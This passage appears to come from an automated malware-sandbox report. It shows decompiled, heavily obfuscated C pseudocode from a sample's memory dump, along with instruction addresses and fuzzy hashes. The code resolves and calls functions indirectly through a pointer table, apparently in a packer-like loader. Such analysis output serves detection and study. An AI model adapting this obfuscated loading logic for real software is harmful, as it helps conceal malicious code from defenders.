                  					 *_t760 =  *_t760 ^ _t603;
                  					_t162 = _t570 + 0x41c220; // 0x41c220
                  					 *(_t744 - 0x14) = 0;
                  					 *_t760 =  *_t760 + _t162;
                  					_t475 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x14), _t648);
                  					 *(_t744 - 0x10) = _t603;
                  					 *(_t570 + 0x41cf1d) =  *(_t570 + 0x41cf1d) & 0x00000000;
                  					 *(_t570 + 0x41cf1d) =  *(_t570 + 0x41cf1d) ^ (_t603 ^  *(_t744 - 0x10) | _t475);
                  					_t476 =  *((intOrPtr*)(_t570 + 0x41f054))();
                  					 *(_t744 - 0x14) = 0;
                  					 *_t760 =  *_t760 + _t476;
                  					_t176 = _t570 + 0x41c49b; // 0x41c49b
                  					 *(_t744 - 0x10) = 0;
                  					 *_t760 =  *_t760 + _t176;
                  					_t478 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10),  *(_t744 - 0x14));
                  					 *(_t744 - 0x14) = _t709;
                  					 *(_t570 + 0x41c8aa) =  *(_t570 + 0x41c8aa) & 0x00000000;
                  					 *(_t570 + 0x41c8aa) =  *(_t570 + 0x41c8aa) | _t709 & 0x00000000 ^ _t478;
                  					_t712 =  *(_t744 - 0x14);
                  					_t761 = _t760 - 0xfffffffc;
                  					 *(_t744 - 0x10) = _t648;
                  					 *(_t744 - 4) =  *(_t744 - 4) & 0x00000000;
                  					 *(_t744 - 4) =  *(_t744 - 4) ^ _t648 -  *(_t744 - 0x10) ^ _t478 & 0x00000000 ^  *_t760;
                  					_t651 =  *(_t744 - 0x10);
                  					_t193 = _t570 + 0x41c279; // 0x41c279
                  					 *_t761 = _t193;
                  					_t195 = _t570 + 0x41d1ea; // 0x41d1ea
                  					 *_t761 =  *_t761 - _t712;
                  					 *_t761 = _t195;
                  					_t483 =  *((intOrPtr*)(_t570 + 0x41f068))(_t712,  *(_t744 - 0x14));
                  					 *(_t744 - 0x14) =  *(_t744 - 0x10);
                  					 *(_t570 + 0x41cbc5) = 0 ^ _t483;
                  					_t609 =  *(_t744 - 0x14);
                  					do {
                  						if(( *_t712 & 0x80000000) != 0) {
                  							_t761[1] =  *_t712;
                  							_t572 = _t570;
                  							 *_t761 =  *_t761 ^ _t712;
                  							 *_t761 =  *_t761 ^ _t572 + 0x0041d099;
                  							_t485 =  *((intOrPtr*)(_t572 + 0x41f060))(_t744);
                  							 *_t761 = _t609;
                  							 *(_t572 + 0x41c24c) = 0 ^ _t485;
                  							_t612 = 0;
                  							 *_t299 = _t712;
                  							 *_t761 =  *_t761 & 0x00000000;
                  							 *_t761 =  *_t761 + _t572 + 0x41cdd2;
                  							 *_t761 =  *_t761 & 0x00000000;
                  							 *_t761 =  *_t761 | _t572 + 0x0041c846;
                  							_t488 =  *((intOrPtr*)(_t572 + 0x41f068))(_t744, _t685);
                  							 *(_t744 - 0x10) = _t651;
                  							 *(_t572 + 0x41c9fe) = 0 ^ _t488;
                  							_t654 =  *(_t744 - 0x10);
                  							 *(_t744 - 0xc) =  *(_t744 - 0xc) & 0x0000ffff;
                  							 *_t761 =  *_t761 ^ _t654;
                  							 *_t761 =  *_t761 | _t572 + 0x0041c9e4;
                  							 *_t761 =  *_t761 & 0x00000000;
                  							 *_t761 =  *_t761 ^ _t572 + 0x0041c746;
                  							_t491 =  *((intOrPtr*)(_t572 + 0x41f068))(_t654, _t654);
                  							 *(_t744 - 0x14) = _t654;
                  							 *(_t572 + 0x41c559) =  *(_t572 + 0x41c559) & 0x00000000;
                  							 *(_t572 + 0x41c559) =  *(_t572 + 0x41c559) ^ (_t654 ^  *(_t744 - 0x14) | _t491);
                  							_t657 =  *(_t744 - 0x14);
                  						} else {
                  							_t202 = _t570 + 0x41c8e1; // 0x41c8e1
                  							 *_t761 =  *_t761 - _t651;
                  							 *_t761 =  *_t761 | _t202;
                  							_t525 =  *((intOrPtr*)(_t570 + 0x41f060))(_t651);
                  							 *(_t744 - 0x10) = 0;
                  							 *_t761 =  *_t761 | _t525;
                  							_t206 = _t570 + 0x41c6e2; // 0x41c6e2
                  							 *_t761 =  *_t761 - _t570;
                  							 *_t761 =  *_t761 | _t206;
                  							_t527 =  *((intOrPtr*)(_t570 + 0x41f060))(_t570,  *(_t744 - 0x10));
                  							_t623 = (_t609 & 0x00000000) +  *_t761;
                  							_t764 = _t761 - 0xfffffffc;
                  							 *_t764 =  *_t764 + _t685;
                  							_t691 = _t527;
                  							_t528 = _t691 + _t623;
                  							_t693 = 0;
                  							 *(_t744 - 0x10) = _t651;
                  							_t625 = _t623 & 0x00000000 ^ _t651 ^  *(_t744 - 0x10) ^  *(_t570 + 0x41c521);
                  							_t664 =  *(_t744 - 0x10);
                  							if(_t625 > _t528) {
                  								_t212 = _t570 + 0x41c8e1; // 0x41c8e1
                  								 *_t764 =  *_t764 & 0x00000000;
                  								 *_t764 =  *_t764 | _t212;
                  								_t213 = _t570 + 0x41c6e2; // 0x41c6e2
                  								 *_t764 = _t213;
                  								_t528 =  *((intOrPtr*)(_t570 + 0x41f064))( *(_t744 - 0x10), _t712);
                  							}
                  							 *(_t570 + 0x41c56c) =  *(_t570 + 0x41c56c) & 0x00000000;
                  							 *(_t570 + 0x41c56c) =  *(_t570 + 0x41c56c) ^ (_t744 & 0x00000000 | _t528);
                  							_t744 = _t744;
                  							 *_t764 =  *_t764 & 0x00000000;
                  							 *_t764 =  *_t764 + _t712;
                  							_t220 = _t570 + 0x41c266; // 0x41c266
                  							 *_t764 = _t220;
                  							_push( *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x10), _t528));
                  							_pop( *_t223);
                  							_push( *(_t744 - 0x10));
                  							_pop( *_t225);
                  							_t729 =  *_t712;
                  							_t226 = _t570 + 0x41ce1f; // 0x41ce1f
                  							 *_t764 =  *_t764 & 0x00000000;
                  							 *_t764 =  *_t764 ^ _t226;
                  							_t532 =  *((intOrPtr*)(_t570 + 0x41f060))(_t729);
                  							 *(_t744 - 0x10) = 0;
                  							 *_t764 =  *_t764 ^ _t532;
                  							_t230 = _t570 + 0x41c0ad; // 0x41c0ad
                  							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
                  							 *_t764 =  *_t764 | _t230;
                  							_t534 =  *((intOrPtr*)(_t570 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x10));
                  							_pop( *_t235);
                  							_t627 = _t625 & 0x00000000 |  *(_t744 - 0x14);
                  							 *_t237 = _t534;
                  							 *(_t744 - 0x10) =  *(_t744 - 0x10) + _t627;
                  							_push( *(_t744 - 0x10));
                  							_pop(_t535);
                  							_t666 = _t664;
                  							 *(_t744 - 0x10) = _t729;
                  							_t629 = _t627 & 0x00000000 | _t729 & 0x00000000 ^  *(_t570 + 0x41c765);
                  							_t732 =  *(_t744 - 0x10);
                  							if(_t629 > _t535) {
                  								_t244 = _t570 + 0x41ce1f; // 0x41ce1f
                  								 *_t764 = _t244;
                  								_t246 = _t570 + 0x41c0ad; // 0x41c0ad
                  								 *_t764 =  *_t764 & 0x00000000;
                  								 *_t764 =  *_t764 | _t246;
                  								_t535 =  *((intOrPtr*)(_t570 + 0x41f064))(_t744,  *(_t744 - 0x14));
                  							}
                  							 *_t764 = _t666;
                  							 *(_t570 + 0x41c497) = 0 ^ _t535;
                  							_t669 = 0;
                  							 *_t764 = _t693;
                  							_t694 = _t732;
                  							_t733 = _t694 +  *(_t744 + 8);
                  							_t696 = 0;
                  							_t250 = _t570 + 0x41d159; // 0x41d159
                  							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
                  							 *_t764 =  *_t764 ^ _t250;
                  							_t254 = _t570 + 0x41d213; // 0x41d213
                  							 *(_t744 - 0x10) = 0;
                  							 *_t764 =  *_t764 + _t254;
                  							_t538 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x10),  *(_t744 - 0x14));
                  							 *(_t744 - 0x14) = _t733;
                  							 *(_t570 + 0x41d182) =  *(_t570 + 0x41d182) & 0x00000000;
                  							 *(_t570 + 0x41d182) =  *(_t570 + 0x41d182) ^ (_t733 ^  *(_t744 - 0x14) | _t538);
                  							_t612 = _t629;
                  							_t265 = _t570 + 0x41c85c; // 0x41c85c
                  							 *_t764 =  *_t764 & 0x00000000;
                  							 *_t764 =  *_t764 | _t265;
                  							_t266 = _t570 + 0x41c10e; // 0x41c10e
                  							 *_t764 = _t266;
                  							_t541 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x14), _t669);
                  							 *(_t570 + 0x41ce00) =  *(_t570 + 0x41ce00) & 0x00000000;
                  							 *(_t570 + 0x41ce00) =  *(_t570 + 0x41ce00) | _t669 & 0x00000000 | _t541;
                  							_t672 = _t669;
                  							_push( *(_t744 - 0x14) + 2);
                  							_pop( *_t273);
                  							_push( *(_t744 - 0x14));
                  							_pop( *_t275);
                  							_t276 = _t570 + 0x41c9a3; // 0x41c9a3
                  							 *(_t744 - 0x14) =  *(_t744 - 0x14) & 0x00000000;
                  							 *_t764 =  *_t764 ^ _t276;
                  							_t280 = _t570 + 0x41d1fa; // 0x41d1fa
                  							 *_t764 = _t280;
                  							_t544 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x14),  *(_t744 - 0x14));
                  							 *_t764 = _t672;
                  							 *((intOrPtr*)(_t570 + 0x41d0fe)) = _t544;
                  							_t657 = 0;
                  							_t712 = 0 ^  *_t764;
                  							_t761 =  &(_t764[1]);
                  							_t284 = _t570 + 0x41d0af; // 0x41d0af
                  							 *_t761 =  *_t761 & 0x00000000;
                  							 *_t761 =  *_t761 | _t284;
                  							_t285 = _t570 + 0x41ceae; // 0x41ceae
                  							 *_t761 = _t285;
                  							_t491 =  *((intOrPtr*)(_t570 + 0x41f068))( *(_t744 - 0x10), _t612);
                  							 *(_t744 - 0x10) = _t696;
                  							 *(_t570 + 0x41c8cd) =  *(_t570 + 0x41c8cd) & 0x00000000;
                  							 *(_t570 + 0x41c8cd) =  *(_t570 + 0x41c8cd) ^ _t696 -  *(_t744 - 0x10) ^ _t491;
                  							_t685 =  *(_t744 - 0x10);
                  						}
                  						 *(_t744 - 0x10) = _t572;
                  						_t575 =  *(_t744 - 0x10);
                  						_t322 = _t575 + 0x41cb0b; // 0x41cb0b
                  						 *(_t744 - 0x14) = 0;
                  						 *_t761 =  *_t761 | _t322;
                  						_t495 =  *((intOrPtr*)(_t575 + 0x41f060))( *(_t744 - 0x14));
                  						 *_t761 = _t495;
                  						_t327 = _t575 + 0x41cda5; // 0x41cda5
                  						 *_t761 = _t327;
                  						_t497 =  *((intOrPtr*)(_t575 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x10));
                  						_t762 = _t761 - 0xfffffffc;
                  						 *_t762 =  *_t762 ^ _t744;
                  						_t745 = _t497;
                  						_t498 = _t745 +  *_t761;
                  						_t747 = 0;
                  						 *(_t747 - 0x14) = _t712;
                  						_t615 =  *(_t575 + 0x41c96a);
                  						_t715 =  *(_t747 - 0x14);
                  						if(_t615 > _t498) {
                  							_t333 = _t575 + 0x41cb0b; // 0x41cb0b
                  							 *_t762 =  *_t762 & 0x00000000;
                  							 *_t762 =  *_t762 | _t333;
                  							_t334 = _t575 + 0x41cda5; // 0x41cda5
                  							 *(_t747 - 0x14) =  *(_t747 - 0x14) & 0x00000000;
                  							 *_t762 =  *_t762 | _t334;
                  							_t498 =  *((intOrPtr*)(_t575 + 0x41f064))( *(_t747 - 0x14), _t747);
                  						}
                  						 *_t339 = _t498;
                  						 *_t341 =  *(_t747 - 0x10);
                  						_t762[1] =  *(_t747 - 0xc);
                  						_t577 = _t575;
                  						_t344 = _t577 + 0x41cee2; // 0x41cee2
                  						 *_t762 = _t344;
                  						_t346 = _t577 + 0x41d33a; // 0x41d33a
                  						 *(_t747 - 0x14) = 0;
                  						 *_t762 =  *_t762 | _t346;
                  						_t501 =  *((intOrPtr*)(_t577 + 0x41f068))( *(_t747 - 0x14),  *(_t747 - 0x10), _t615);
                  						 *(_t577 + 0x41d1da) =  *(_t577 + 0x41d1da) & 0x00000000;
                  						 *(_t577 + 0x41d1da) =  *(_t577 + 0x41d1da) | _t715 -  *_t762 | _t501;
                  						_t718 = _t715;
                  						 *(_t747 - 0x10) = _t685;
                  						_t688 =  *(_t747 - 0x10);
                  						 *_t762 =  *_t762 - _t657;
                  						 *_t762 =  *_t762 ^ (_t501 & 0x00000000 | _t685 ^  *(_t747 - 0x10) |  *(_t747 - 4));
                  						_t358 = _t577 + 0x41d2b3; // 0x41d2b3
                  						 *_t762 =  *_t762 - _t657;
                  						 *_t762 = _t358;
                  						_t359 = _t577 + 0x41cb87; // 0x41cb87
                  						 *(_t747 - 0x10) =  *(_t747 - 0x10) & 0x00000000;
                  						 *_t762 =  *_t762 + _t359;
                  						_t506 =  *((intOrPtr*)(_t577 + 0x41f068))( *(_t747 - 0x10), _t657, _t657);
                  						 *(_t747 - 0x10) = _t615;
                  						 *(_t577 + 0x41cf9a) =  *(_t577 + 0x41cf9a) & 0x00000000;
                  						 *(_t577 + 0x41cf9a) =  *(_t577 + 0x41cf9a) | _t615 ^  *(_t747 - 0x10) | _t506;
                  						_t618 =  *(_t747 - 0x10);
                  						_t763 =  &(_t762[1]);
                  						 *(_t747 - 0x10) = 0;
                  						 *_t763 =  *_t763 ^  *_t762;
                  						_t373 = _t577 + 0x41c922; // 0x41c922
                  						 *(_t747 - 0x10) = 0;
                  						 *_t763 =  *_t763 | _t373;
                  						_t376 = _t577 + 0x41c97d; // 0x41c97d
                  						 *_t763 =  *_t763 & 0x00000000;
                  						 *_t763 =  *_t763 + _t376;
                  						_t511 =  *((intOrPtr*)(_t577 + 0x41f068))(_t618,  *(_t747 - 0x10),  *(_t747 - 0x10));
                  						 *(_t577 + 0x41cae1) =  *(_t577 + 0x41cae1) & 0x00000000;
                  						 *(_t577 + 0x41cae1) =  *(_t577 + 0x41cae1) | _t747 & 0x00000000 | _t511;
                  						_t744 = _t747;
                  						_t512 =  *((intOrPtr*)(_t577 + 0x41f050))();
                  						 *(_t744 - 0x14) = 0;
                  						 *_t763 =  *_t763 + _t512;
                  						_t385 = _t577 + 0x41c197; // 0x41c197
                  						 *(_t744 - 0x14) = 0;
                  						 *_t763 =  *_t763 | _t385;
                  						_t514 =  *((intOrPtr*)(_t577 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x14));
                  						 *(_t744 - 0x14) = 0;
                  						 *_t763 =  *_t763 | _t514;
                  						_t391 = _t577 + 0x41c46f; // 0x41c46f
                  						 *(_t744 - 0x14) = 0;
                  						 *_t763 =  *_t763 ^ _t391;
                  						_t516 =  *((intOrPtr*)(_t577 + 0x41f060))( *(_t744 - 0x14),  *(_t744 - 0x14));
                  						_pop( *_t395);
                  						_t620 = (_t618 & 0x00000000) +  *(_t744 - 0x10);
                  						 *_t397 = _t516;
                  						 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t620;
                  						_push( *(_t744 - 0x14));
                  						_pop(_t517);
                  						_t579 = _t577;
                  						 *(_t744 - 0x10) = _t688;
                  						_t609 = _t620 & 0x00000000 ^ _t688 -  *(_t744 - 0x10) ^  *(_t579 + 0x41c9d0);
                  						_t685 =  *(_t744 - 0x10);
                  						if(_t609 > _t517) {
                  							_t405 = _t579 + 0x41c197; // 0x41c197
                  							 *_t763 =  *_t763 & 0x00000000;
                  							 *_t763 =  *_t763 + _t405;
                  							_t406 = _t579 + 0x41c46f; // 0x41c46f
                  							 *(_t744 - 0x10) = 0;
                  							 *_t763 =  *_t763 ^ _t406;
                  							_t517 =  *((intOrPtr*)(_t579 + 0x41f064))( *(_t744 - 0x10), _t718);
                  							 *(_t579 + 0x41cfe1) =  *(_t579 + 0x41cfe1) & 0x00000000;
                  							 *(_t579 + 0x41cfe1) =  *(_t579 + 0x41cfe1) | _t744 ^  *_t763 ^ _t517;
                  							_t744 = _t744;
                  						}
                  						_t761 =  &(_t763[1]);
                  						 *_t761 =  *_t761 ^ _t744;
                  						 *_t761 = _t718;
                  						 *_t761 = _t517 & 0x00000000 |  *_t763;
                  						_t522 = 0;
                  						 *_t761 = _t657;
                  						 *((intOrPtr*)( *((intOrPtr*)(_t744 - 8)))) = _t522;
                  						_t660 = 0;
                  						 *_t415 = _t744;
                  						 *_t761 = 4;
                  						_t523 = _t579;
                  						 *_t417 = 0 ^  *(_t744 - 0x14);
                  						 *(_t744 - 0x14) =  *(_t744 - 0x14) + _t523;
                  						_push( *(_t744 - 0x14));
                  						_pop(_t712);
                  						_t651 = _t660;
                  						 *_t422 =  *((intOrPtr*)(_t744 - 8));
                  						 *(_t744 - 0x10) =  *(_t744 - 0x10) + _t523;
                  						_push( *(_t744 - 0x10));
                  						_pop( *_t426);
                  						_t570 = _t579;
                  					} while ( *_t712 != 0);
                  					_t680 = _t685 + 0x14;
                  					_t701 = _t712;
                  				} while ( *_t680 != 0 ||  *(_t680 + 0x10) != 0);
                  				 *_t761 =  *_t761 ^ _t523;
                  				_t555 = _t523;
                  				return _t555;
                  			}

























































































































                  0x03055262
                  0x03055262
                  0x03055268
                  0x0305526f
                  0x03055272
                  0x0305527b
                  0x0305527c
                  0x0305527f
                  0x03055282
                  0x03055288
                  0x03055290
                  0x03055297
                  0x030552a0
                  0x030552a6
                  0x030552ac
                  0x030552ad
                  0x030552b1
                  0x030552b4
                  0x030552ba
                  0x030552c2
                  0x030552c9
                  0x030552d2
                  0x030552da
                  0x030552de
                  0x030552df
                  0x030552e5
                  0x030552e6
                  0x030552ea
                  0x030552ed
                  0x030552f3
                  0x030552f4
                  0x030552f8
                  0x030552fb
                  0x03055303
                  0x0305530a
                  0x03055310
                  0x03055311
                  0x03055314
                  0x03055405
                  0x0305540b
                  0x0305540c
                  0x03055413
                  0x03055417
                  0x0305541a
                  0x03055421
                  0x03055424
                  0x03055427
                  0x03055433
                  0x0305543a
                  0x03055440
                  0x0305531a
                  0x0305531a
                  0x03055320
                  0x0305532a
                  0x0305532d
                  0x03055333
                  0x0305533a
                  0x03055343
                  0x03055346
                  0x03055349
                  0x0305534c
                  0x0305534d
                  0x03055356
                  0x03055359
                  0x03055365
                  0x0305536c
                  0x03055372
                  0x03055372
                  0x03055445
                  0x03055445
                  0x03055448
                  0x0305544f
                  0x03055452
                  0x03055455
                  0x0305545d
                  0x03055464
                  0x0305546a
                  0x0305546b
                  0x0305546e
                  0x03055477
                  0x0305547a
                  0x03055480
                  0x03055487
                  0x0305548a
                  0x03055491
                  0x03055495
                  0x03055498
                  0x030554a0
                  0x030554a3
                  0x030554aa
                  0x030554ad
                  0x030554b0
                  0x030554b3
                  0x030554b4
                  0x030554b5
                  0x030554c4
                  0x030554c6
                  0x030554cb
                  0x030554cd
                  0x030554d6
                  0x030554d9
                  0x030554df
                  0x030554e6
                  0x030554e9
                  0x030554e9
                  0x030554ef
                  0x030554f7
                  0x030554fe
                  0x03055504
                  0x03055507
                  0x03055515
                  0x03055519
                  0x0305551d
                  0x03055520
                  0x03055527
                  0x0305552b
                  0x0305552e
                  0x03055535
                  0x03055539
                  0x0305553c
                  0x03055542
                  0x0305554a
                  0x03055551
                  0x03055557
                  0x0305555a
                  0x03055562
                  0x03055565
                  0x03055568
                  0x0305556b
                  0x0305556e
                  0x0305556f
                  0x03055576
                  0x03055579
                  0x0305557c
                  0x03055582
                  0x0305558c
                  0x03055595
                  0x03055596
                  0x03055599
                  0x0305559c
                  0x030555a2
                  0x030555a5
                  0x030555a8
                  0x030555ab
                  0x030555ad
                  0x030555b1
                  0x030555b4
                  0x030555bb
                  0x030555be
                  0x030555c1
                  0x030555c7
                  0x030555cf
                  0x030555d6
                  0x030555dc
                  0x030555e8
                  0x030555eb
                  0x030555ed
                  0x030555f0
                  0x030555f1
                  0x030555fb
                  0x030555fe
                  0x03055607
                  0x0305560a
                  0x03055611
                  0x03055614
                  0x03055617
                  0x0305561d
                  0x03055624
                  0x03055627
                  0x0305562f
                  0x03055632
                  0x03055635
                  0x0305563c
                  0x0305563d
                  0x03055640
                  0x0305564e
                  0x03055650
                  0x03055653
                  0x03055655
                  0x0305565b
                  0x03055662
                  0x03055665
                  0x0305566b
                  0x03055675
                  0x03055678
                  0x0305567e
                  0x03055685
                  0x0305568b
                  0x0305568b
                  0x03055694
                  0x0305569c
                  0x030556a0
                  0x030556a4
                  0x030556a6
                  0x030556a8
                  0x030556ac
                  0x030556af
                  0x030556b8
                  0x030556bb
                  0x030556c2
                  0x030556c6
                  0x030556c9
                  0x030556cf
                  0x030556d6
                  0x030556dc
                  0x030556e1
                  0x030556e4
                  0x030556e8
                  0x030556eb
                  0x030556ee
                  0x030556f4
                  0x030556fe
                  0x03055701
                  0x03055707
                  0x0305570f
                  0x03055716
                  0x0305571f
                  0x03055725
                  0x0305572f
                  0x03055732
                  0x03055738
                  0x03055742
                  0x03055745
                  0x0305574b
                  0x03055753
                  0x0305575a
                  0x03055760
                  0x0305576c
                  0x0305576f
                  0x03055777
                  0x0305577b
                  0x0305577e
                  0x03055781
                  0x0305578a
                  0x0305578d
                  0x03055794
                  0x03055797
                  0x0305579a
                  0x030557a0
                  0x030557a7
                  0x030557ad
                  0x030557b0
                  0x030557b6
                  0x03055a4d
                  0x03055a51
                  0x03055a59
                  0x03055a5c
                  0x03055a5f
                  0x03055a67
                  0x03055a6e
                  0x03055a74
                  0x03055a75
                  0x03055a7f
                  0x03055a83
                  0x03055a8d
                  0x03055a91
                  0x03055a94
                  0x03055a9a
                  0x03055aa1
                  0x03055aa7
                  0x03055aaa
                  0x03055ab8
                  0x03055abb
                  0x03055ac5
                  0x03055ac9
                  0x03055acc
                  0x03055ad2
                  0x03055ada
                  0x03055ae1
                  0x03055ae7
                  0x030557bc
                  0x030557bc
                  0x030557c3
                  0x030557c6
                  0x030557c9
                  0x030557cf
                  0x030557d9
                  0x030557dc
                  0x030557e3
                  0x030557e6
                  0x030557e9
                  0x030557f5
                  0x030557f8
                  0x030557fd
                  0x03055801
                  0x03055804
                  0x03055806
                  0x03055807
                  0x03055816
                  0x03055818
                  0x0305581d
                  0x0305581f
                  0x03055826
                  0x0305582a
                  0x0305582d
                  0x03055836
                  0x03055839
                  0x03055839
                  0x03055845
                  0x0305584c
                  0x03055852
                  0x03055854
                  0x03055858
                  0x0305585b
                  0x03055864
                  0x0305586d
                  0x0305586e
                  0x03055871
                  0x03055874
                  0x0305587a
                  0x0305587c
                  0x03055883
                  0x03055887
                  0x0305588a
                  0x03055890
                  0x0305589a
                  0x0305589d
                  0x030558a3
                  0x030558aa
                  0x030558ad
                  0x030558b9
                  0x030558bc
                  0x030558c3
                  0x030558c6
                  0x030558c9
                  0x030558cc
                  0x030558cd
                  0x030558ce
                  0x030558dd
                  0x030558df
                  0x030558e4
                  0x030558e6
                  0x030558ef
                  0x030558f2
                  0x030558f9
                  0x030558fd
                  0x03055900
                  0x03055900
                  0x03055908
                  0x0305590f
                  0x03055915
                  0x03055918
                  0x0305591c
                  0x03055920
                  0x03055922
                  0x03055923
                  0x03055929
                  0x03055930
                  0x03055933
                  0x03055939
                  0x03055943
                  0x03055946
                  0x0305594c
                  0x03055954
                  0x0305595b
                  0x0305596f
                  0x03055970
                  0x03055977
                  0x0305597b
                  0x0305597e
                  0x03055987
                  0x0305598a
                  0x03055996
                  0x0305599d
                  0x030559a3
                  0x030559a4
                  0x030559a5
                  0x030559a8
                  0x030559ab
                  0x030559ae
                  0x030559b4
                  0x030559bb
                  0x030559be
                  0x030559c7
                  0x030559ca
                  0x030559d2
                  0x030559d9
                  0x030559df
                  0x030559e2
                  0x030559e5
                  0x030559e8
                  0x030559ef
                  0x030559f3
                  0x030559f6
                  0x030559ff
                  0x03055a02
                  0x03055a08
                  0x03055a10
                  0x03055a17
                  0x03055a1d
                  0x03055a1d
                  0x03055aea
                  0x03055af8
                  0x03055afb
                  0x03055b01
                  0x03055b0b
                  0x03055b0e
                  0x03055b17
                  0x03055b1a
                  0x03055b23
                  0x03055b26
                  0x03055b35
                  0x03055b3a
                  0x03055b3e
                  0x03055b41
                  0x03055b43
                  0x03055b44
                  0x03055b4f
                  0x03055b51
                  0x03055b56
                  0x03055b58
                  0x03055b5f
                  0x03055b63
                  0x03055b66
                  0x03055b6c
                  0x03055b73
                  0x03055b76
                  0x03055b76
                  0x03055b7d
                  0x03055b83
                  0x03055b8e
                  0x03055b92
                  0x03055b93
                  0x03055b9c
                  0x03055b9f
                  0x03055ba5
                  0x03055baf
                  0x03055bb2
                  0x03055bbe
                  0x03055bc5
                  0x03055bcb
                  0x03055bcc
                  0x03055bda
                  0x03055bde
                  0x03055be1
                  0x03055be4
                  0x03055beb
                  0x03055bee
                  0x03055bf1
                  0x03055bf7
                  0x03055bfe
                  0x03055c01
                  0x03055c07
                  0x03055c0f
                  0x03055c16
                  0x03055c1c
                  0x03055c28
                  0x03055c2b
                  0x03055c35
                  0x03055c38
                  0x03055c3e
                  0x03055c48
                  0x03055c4b
                  0x03055c52
                  0x03055c56
                  0x03055c59
                  0x03055c65
                  0x03055c6c
                  0x03055c72
                  0x03055c73
                  0x03055c79
                  0x03055c83
                  0x03055c86
                  0x03055c8c
                  0x03055c96
                  0x03055c99
                  0x03055c9f
                  0x03055ca9
                  0x03055cac
                  0x03055cb2
                  0x03055cbc
                  0x03055cbf
                  0x03055ccb
                  0x03055cce
                  0x03055cd5
                  0x03055cd8
                  0x03055cdb
                  0x03055cde
                  0x03055cdf
                  0x03055ce0
                  0x03055cef
                  0x03055cf1
                  0x03055cf6
                  0x03055cf8
                  0x03055cff
                  0x03055d03
                  0x03055d06
                  0x03055d0c
                  0x03055d16
                  0x03055d19
                  0x03055d25
                  0x03055d2c
                  0x03055d32
                  0x03055d32
                  0x03055d3c
                  0x03055d40
                  0x03055d43
                  0x03055d48
                  0x03055d52
                  0x03055d55
                  0x03055d5c
                  0x03055d5e
                  0x03055d61
                  0x03055d68
                  0x03055d6f
                  0x03055d74
                  0x03055d77
                  0x03055d7a
                  0x03055d7d
                  0x03055d7e
                  0x03055d85
                  0x03055d88
                  0x03055d8b
                  0x03055d8e
                  0x03055d91
                  0x03055d92
                  0x03055da4
                  0x03055da6
                  0x03055da7
                  0x03055dbb
                  0x03055dbe
                  0x03055dd0

                  Memory Dump Source
                  • Source File: 00000000.00000002.602925893.0000000003050000.00000040.00000001.sdmp, Offset: 03050000, based on PE: true
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2616795092f367d06362dbc9c4ea195590f79d012455bc9ff3e9898c1f741067
                  • Instruction ID: cb9259229be48a2fc4b7ccd13d27b8c871245a3c009b4a4fb50aa481181c0ea5
                  • Opcode Fuzzy Hash: 2616795092f367d06362dbc9c4ea195590f79d012455bc9ff3e9898c1f741067
                  • Instruction Fuzzy Hash: 24724372844219DFEF04DFA0C9897EEBBF0FF08311F19486ED889AA145D7741664CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E03055378(signed int __ebx, signed int __ecx, intOrPtr* __edi, signed int __esi) {
                  				void* _t419;
                  				void* _t421;
                  				signed int _t422;
                  				signed int _t425;
                  				signed int _t428;
                  				intOrPtr _t430;
                  				signed int _t432;
                  				void* _t434;
                  				signed int _t435;
                  				signed int _t438;
                  				signed int _t443;
                  				signed int _t449;
                  				void* _t450;
                  				signed int _t454;
                  				void* _t456;
                  				intOrPtr _t457;
                  				intOrPtr _t460;
                  				signed int _t462;
                  				void* _t463;
                  				signed int _t465;
                  				signed int _t470;
                  				signed int _t472;
                  				signed int _t475;
                  				signed int _t478;
                  				signed int _t482;
                  				void* _t484;
                  				void* _t485;
                  				signed int _t488;
                  				signed int _t493;
                  				signed int _t498;
                  				void* _t499;
                  				signed int _t501;
                  				void* _t503;
                  				signed int _t504;
                  				intOrPtr _t509;
                  				signed int _t510;
                  				signed int _t512;
                  				void* _t514;
                  				signed int _t515;
                  				signed int _t519;
                  				void* _t521;
                  				signed int _t522;
                  				signed int _t525;
                  				signed int _t528;
                  				intOrPtr _t531;
                  				signed int _t539;
                  				signed int _t541;
                  				void* _t542;
                  				signed int _t551;
                  				signed int _t554;
                  				signed int _t557;
                  				signed int _t559;
                  				signed int _t562;
                  				void* _t564;
                  				void* _t566;
                  				signed int _t573;
                  				signed int _t575;
                  				void* _t576;
                  				signed int _t581;
                  				signed int _t583;
                  				void* _t586;
                  				signed int _t588;
                  				signed int _t590;
                  				signed int _t596;
                  				void* _t599;
                  				signed int _t602;
                  				signed int _t605;
                  				signed int _t607;
                  				signed int _t610;
                  				signed int _t612;
                  				signed int _t614;
                  				signed int _t616;
                  				signed int _t619;
                  				signed int _t622;
                  				signed int _t626;
                  				signed int _t629;
                  				signed int _t632;
                  				signed int _t635;
                  				signed int _t638;
                  				signed int _t641;
                  				signed int _t644;
                  				signed int _t647;
                  				void* _t650;
                  				signed int _t654;
                  				signed int _t656;
                  				signed int _t659;
                  				signed int _t662;
                  				intOrPtr* _t665;
                  				signed int _t667;
                  				signed int _t670;
                  				signed int _t673;
                  				void* _t676;
                  				signed int _t678;
                  				void* _t679;
                  				signed int _t681;
                  				signed int _t687;
                  				signed int _t690;
                  				void* _t691;
                  				signed int _t693;
                  				signed int _t694;
                  				signed int _t697;
                  				signed int _t700;
                  				signed int _t703;
                  				signed int _t714;
                  				signed int _t717;
                  				signed int _t718;
                  				signed int _t726;
                  				void* _t727;
                  				signed int _t729;
                  				signed int* _t739;
                  				signed int* _t740;
                  				signed int* _t741;
                  				signed int* _t742;
                  				signed int* _t743;
                  				signed int* _t744;
                  				signed int* _t745;
                  				signed int* _t746;
                  				signed int* _t747;
                  
                  				_t686 = __esi;
                  				_t665 = __edi;
                  				_t551 = __ebx;
